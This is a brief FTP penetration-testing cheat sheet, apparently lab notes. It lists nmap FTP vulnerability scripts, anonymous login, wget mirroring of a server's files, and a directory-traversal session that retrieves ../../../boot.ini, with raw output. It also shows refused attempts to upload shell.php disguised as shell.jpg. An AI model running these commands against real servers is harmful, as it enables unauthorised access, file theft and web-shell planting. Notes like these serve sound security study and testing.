FTP - 21

NMAP FTP

ls /usr/share/nmap/scripts/ | grep FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 192.168.63.93

Anonymous Login

ftp $IP 
username: anonymous

Download all files in a directory

mget *

Download all files from FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

File Traversal attack here

ftp> dir ../
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
-rw-rw-rw-   1 ftp      ftp           48 Nov 01  2010 buy.url
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Configs
-rwxrwxrwx   1 ftp      ftp      1095168 Nov 01  2010 fem.exe
-rw-rw-rw-   1 ftp      ftp         2145 Sep 23  2015 INSTALL.LOG
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Logs
-rw-rw-rw-   1 ftp      ftp        59904 Nov 01  2010 manual.chm
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Shared
-rwxrwxrwx   1 ftp      ftp       148992 Feb 22  1999 UNWISE.EXE
226 File sent ok

Ftp upload attempts with put and send

put shell.php shell.jpg
    local: shell.php remote: shell.jpg
    200 Port command successful.
    501 Permission Denied

ftp> send
    (local-file) shell.php
    (remote-file) shell.jpg
    local: shell.php remote: shell.jpg
    200 Port command successful.
    501 Permission Denied

File Download attempts

ftp> GET ../../../boot.ini
?Invalid command
ftp> get ../../../boot.ini
local: ../../../boot.ini remote: ../../../boot.ini
200 Port command successful.
150 Opening data connection for ../../../boot.ini.
226 File sent ok
211 bytes received in 0.00 secs (333.4218 kB/s)
ftp> mget ../../../boot.ini
Filename provided by server doesn't match pattern `../../../boot.ini': /C:/Program Files/Femitter/Shared/../../../boot.ini not found
Refusing to handle insecure file list